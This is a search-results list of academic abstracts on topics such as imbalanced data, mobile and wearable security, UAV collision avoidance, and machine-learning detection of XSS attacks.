97 research outputs found
Survey on highly imbalanced multi-class data
Machine learning technology has a massive impact on society because it offers solutions to solve many complicated problems like classification, clustering analysis, and predictions, especially during the COVID-19 pandemic. Data distribution in machine learning has been an essential aspect in providing unbiased solutions. From the earliest literatures published on highly imbalanced data until recently, machine learning research has focused mostly on binary classification data problems. Research on highly imbalanced multi-class data is still greatly unexplored when the need for better analysis and predictions in handling Big Data is required. This study focuses on reviews related to the models or techniques in handling highly imbalanced multi-class data, along with their strengths and weaknesses and related domains. Furthermore, the paper uses the statistical method to explore a case study with a severely imbalanced dataset. This article aims to (1) understand the trend of highly imbalanced multi-class data through analysis of related literatures; (2) analyze the previous and current methods of handling highly imbalanced multi-class data; (3) construct a framework of highly imbalanced multi-class data. The chosen highly imbalanced multi-class dataset analysis will also be performed and adapted to the current methods or techniques in machine learning, followed by discussions on open challenges and the future direction of highly imbalanced multi-class data. Finally, for highly imbalanced multi-class data, this paper presents a novel framework. We hope this research can provide insights on the potential development of better methods or techniques to handle and manipulate highly imbalanced multi-class data
Text Similarity Between Concepts Extracted from Source Code and Documentation
Context: Constant evolution in software systems often results in its documentation losing sync with the content of the source code. The traceability research field has often helped in the past with the aim to recover links between code and documentation, when the two fell out of sync. Objective: The aim of this paper is to compare the concepts contained within the source code of a system with those extracted from its documentation, in order to detect how similar these two sets are. If vastly different, the difference between the two sets might indicate a considerable ageing of the documentation, and a need to update it. Methods: In this paper we reduce the source code of 50 software systems to a set of key terms, each containing the concepts of one of the systems sampled. At the same time, we reduce the documentation of each system to another set of key terms. We then use four different approaches for set comparison to detect how the sets are similar. Results: Using the well known Jaccard index as the benchmark for the comparisons, we have discovered that the cosine distance has excellent comparative powers, and depending on the pre-training of the machine learning model. In particular, the SpaCy and the FastText embeddings offer up to 80% and 90% similarity scores. Conclusion: For most of the sampled systems, the source code and the documentation tend to contain very similar concepts. Given the accuracy for one pre-trained model (e.g., FastText), it becomes also evident that a few systems show a measurable drift between the concepts contained in the documentation and in the source code.</p
Security Issues of Mobile and Smart Wearable Devices
Mobile and smart devices (ranging from popular smartphones and tablets to wearable fitness trackers equipped with sensing, computing and networking capabilities) have proliferated lately and redefined the way users carry out their day-to-day activities. These devices bring immense benefits to society and boast improved quality of life for users. As mobile and smart technologies become increasingly ubiquitous, the security of these devices becomes more urgent, and users should take precautions to keep their personal information secure. Privacy has also been called into question as so many of mobile and smart devices collect, process huge quantities of data, and store them on the cloud as a matter of fact. Ensuring confidentiality, integrity, and authenticity of the information is a cybersecurity challenge with no easy solution.
Unfortunately, current security controls have not kept pace with the risks posed by mobile and smart devices, and have proven patently insufficient so far. Thwarting attacks is also a thriving research area with a substantial amount of still unsolved problems. The pervasiveness of smart devices, the growing attack vectors, and the current lack of security call for an effective and efficient way of protecting mobile and smart devices.
This thesis deals with the security problems of mobile and smart devices, providing specific methods for improving current security solutions. Our contributions are grouped into two related areas which present natural intersections and corresponds to the two central parts of this document: (1) Tackling Mobile Malware, and (2) Security Analysis on Wearable and Smart Devices.
In the first part of this thesis, we study methods and techniques to assist security analysts to tackle mobile malware and automate the identification of malicious applications.
We provide threefold contributions in tackling mobile malware: First, we introduce a Secure Message Delivery (SMD) protocol for Device-to-Device (D2D) networks, with primary objective of choosing the most secure path to deliver a message from a sender to a destination in a multi-hop D2D network. Second, we illustrate a survey to investigate concrete and relevant questions concerning Android code obfuscation and protection techniques, where the purpose is to review code obfuscation and code protection practices. We evaluate efficacy of existing code de-obfuscation tools to tackle obfuscated Android malware (which provide attackers with the ability to evade detection mechanisms). Finally, we propose a Machine Learning-based detection framework to hunt malicious Android apps by introducing a system to detect and classify newly-discovered malware through analyzing applications. The proposed system classifies different types of malware from each other and helps to better understanding how malware can infect devices, the threat level they pose and how to protect against them. Our designed system leverages more complete coverage of apps’ behavioral characteristics than the state-of-the-art, integrates the most performant classifier, and utilizes the robustness of extracted features.
The second part of this dissertation conducts an in-depth security analysis of the most popular wearable fitness trackers on the market. Our contributions are grouped into four central parts in this domain: First, we analyze the primitives governing the communication between fitness tracker and cloud-based services. In addition, we investigate communication requirements in this setting such as: (i) Data Confidentiality, (ii) Data Integrity, and (iii) Data Authenticity. Second, we show real-world demos on how modern wearable devices are vulnerable to false data injection attacks. Also, we document successful injection of falsified data to cloud-based services that appears legitimate to the cloud to obtain personal benefits. Third, we circumvent End-to-End protocol encryption implemented in the most advanced and secure fitness trackers (e.g., Fitbit, as the market leader) through Hardware-based reverse engineering. Last but not least, we provide guidelines for avoiding similar vulnerabilities in future system designs
Air Force Institute of Technology Research Report 2014
This report summarizes the research activities of the Air Force Institute of Technology’s Graduate School of Engineering and Management. It describes research interests and faculty expertise; lists student theses/dissertations; identifies research sponsors and contributions; and outlines the procedures for contacting the school. Included in the report are: faculty publications, conference presentations, consultations, and funded research projects. Research was conducted in the areas of Aeronautical and Astronautical Engineering, Electrical Engineering and Electro-Optics, Computer Engineering and Computer Science, Systems Engineering and Management, Operational Sciences, Mathematics, Statistics and Engineering Physics
Selected Papers from the 5th International Electronic Conference on Sensors and Applications
This Special Issue comprises selected papers from the proceedings of the 5th International Electronic Conference on Sensors and Applications, held on 15–30 November 2018, on sciforum.net, an online platform for hosting scholarly e-conferences and discussion groups. In this 5th edition of the electronic conference, contributors were invited to provide papers and presentations from the field of sensors and applications at large, resulting in a wide variety of excellent submissions and topic areas. Papers which attracted the most interest on the web or that provided a particularly innovative contribution were selected for publication in this collection. These peer-reviewed papers are published with the aim of rapid and wide dissemination of research results, developments, and applications. We hope this conference series will grow rapidly in the future and become recognized as a new way and venue by which to (electronically) present new developments related to the field of sensors and their applications
Applied Metaheuristic Computing
For decades, Applied Metaheuristic Computing (AMC) has been a prevailing optimization technique for tackling perplexing engineering and business problems, such as scheduling, routing, ordering, bin packing, assignment, facility layout planning, among others. This is partly because the classic exact methods are constrained with prior assumptions, and partly due to the heuristics being problem-dependent and lacking generalization. AMC, on the contrary, guides the course of low-level heuristics to search beyond the local optimality, which impairs the capability of traditional computation methods. This topic series has collected quality papers proposing cutting-edge methodology and innovative applications which drive the advances of AMC
Personality Identification from Social Media Using Deep Learning: A Review
Social media helps in sharing of ideas and information among people scattered around the world and thus helps in creating communities, groups, and virtual networks. Identification of personality is significant in many types of applications such as in detecting the mental state or character of a person, predicting job satisfaction, professional and personal relationship success, in recommendation systems. Personality is also an important factor to determine individual variation in thoughts, feelings, and conduct systems. According to the survey of Global social media research in 2018, approximately 3.196 billion social media users are in worldwide. The numbers are estimated to grow rapidly further with the use of mobile smart devices and advancement in technology. Support vector machine (SVM), Naive Bayes (NB), Multilayer perceptron neural network, and convolutional neural network (CNN) are some of the machine learning techniques used for personality identification in the literature review. This paper presents various studies conducted in identifying the personality of social media users with the help of machine learning approaches and the recent studies that targeted to predict the personality of online social media (OSM) users are reviewed
Collision Avoidance on Unmanned Aerial Vehicles using Deep Neural Networks
Unmanned Aerial Vehicles (UAVs), although hardly a new technology, have recently
gained a prominent role in many industries, being widely used not only among enthusiastic
consumers but also in high demanding professional situations, and will have a
massive societal impact over the coming years. However, the operation of UAVs is full
of serious safety risks, such as collisions with dynamic obstacles (birds, other UAVs, or
randomly thrown objects). These collision scenarios are complex to analyze in real-time,
sometimes being computationally impossible to solve with existing State of the Art (SoA)
algorithms, making the use of UAVs an operational hazard and therefore significantly reducing
their commercial applicability in urban environments. In this work, a conceptual
framework for both stand-alone and swarm (networked) UAVs is introduced, focusing on
the architectural requirements of the collision avoidance subsystem to achieve acceptable
levels of safety and reliability. First, the SoA principles for collision avoidance against
stationary objects are reviewed. Afterward, a novel image processing approach that uses
deep learning and optical flow is presented. This approach is capable of detecting and
generating escape trajectories against potential collisions with dynamic objects. Finally,
novel models and algorithms combinations were tested, providing a new approach for
the collision avoidance of UAVs using Deep Neural Networks. The feasibility of the proposed
approach was demonstrated through experimental tests using a UAV, created from
scratch using the framework developed.Os veÃculos aéreos não tripulados (VANTs), embora dificilmente considerados uma
nova tecnologia, ganharam recentemente um papel de destaque em muitas indústrias,
sendo amplamente utilizados não apenas por amadores, mas também em situações profissionais
de alta exigência, sendo expectável um impacto social massivo nos próximos
anos. No entanto, a operação de VANTs está repleta de sérios riscos de segurança, como
colisões com obstáculos dinâmicos (pássaros, outros VANTs ou objetos arremessados).
Estes cenários de colisão são complexos para analisar em tempo real, às vezes sendo computacionalmente
impossÃvel de resolver com os algoritmos existentes, tornando o uso de
VANTs um risco operacional e, portanto, reduzindo significativamente a sua aplicabilidade
comercial em ambientes citadinos. Neste trabalho, uma arquitectura conceptual
para VANTs autônomos e em rede é apresentada, com foco nos requisitos arquitetônicos
do subsistema de prevenção de colisão para atingir nÃveis aceitáveis de segurança e confiabilidade.
Os estudos presentes na literatura para prevenção de colisão contra objectos
estacionários são revistos e uma nova abordagem é descrita. Esta tecnica usa técnicas
de aprendizagem profunda e processamento de imagem, para realizar a prevenção de
colisões em tempo real com objetos móveis. Por fim, novos modelos e combinações de algoritmos
são propostos, fornecendo uma nova abordagem para evitar colisões de VANTs
usando Redes Neurais Profundas. A viabilidade da abordagem foi demonstrada através
de testes experimentais utilizando um VANT, desenvolvido a partir da arquitectura
apresentada
Recommended from our members
Investigating the detection of stored scripting attacks using machine learning
Web applications now play an essential role in our daily lives; through them we can make bank transfers, purchase products and/or make bookings on the Internet. This makes them a target for attackers who will attempt to exploit security vulnerabilities in web applications in order to obtain access to sensitive user information or gain unauthorized privileges. One of the most common attacks aimed at stealing user information is Cross-Site Scripting; this is ranked among the top 10 security vulnerabilities in web applications. Traditional defense systems rely on a signature database describing known attacks; however, XSS attacks written in JavaScript are very variable; they do not exist only in a single form. The most common cause of XSS security vulnerabilities is weakness of verification of the user’s input. This provides the motivation for finding a method for identifying malicious code, written in JavaScript, that an attacker attempts to have executed on the server.
Machine learning has contributed to the security of web applications. Several studies have been conducted in relation to Intrusion Detecting Systems (IDS) which detect and prevent attacks against web applications. Cross-Site Scripting is one of the attacks that has been studied employing a number of methods: for example, using features to identify obfuscated scripts or using JavaScript keywords, evaluating machine learning algorithms in term of detecting attacks against web applications such as random forest, and SVM. These studies have achieved highly accurate results by using machine learning to detect XSS attacks. They often attained better results than dynamic and static analysis in terms of acting as a protection layer for web applications.
This present study will demonstrate the use of machine learning methods, incorporated into a web application at the user input validation stage - prior to the request being passed to the application server. Classifiers will be used to prevent persistent or stored XSS attacks, which are caused by malicious code injections via an input point in the web application. This study relies on supervised machine learning and the application of Boolean feature sets, in order to achieve ease and speed of classification. Furthermore, this study examined the use of such methods on two other types of injection attacks: SQL-i and LDAP. Cascading classifiers and ensemble techniques were used to reduce complexity while maintaining accuracy and speed. To understand how a decision is made in the classifier, an approximate Boolean function is extracted; this is done based on the techniques which have been employed to extract rules from black box classifiers
- …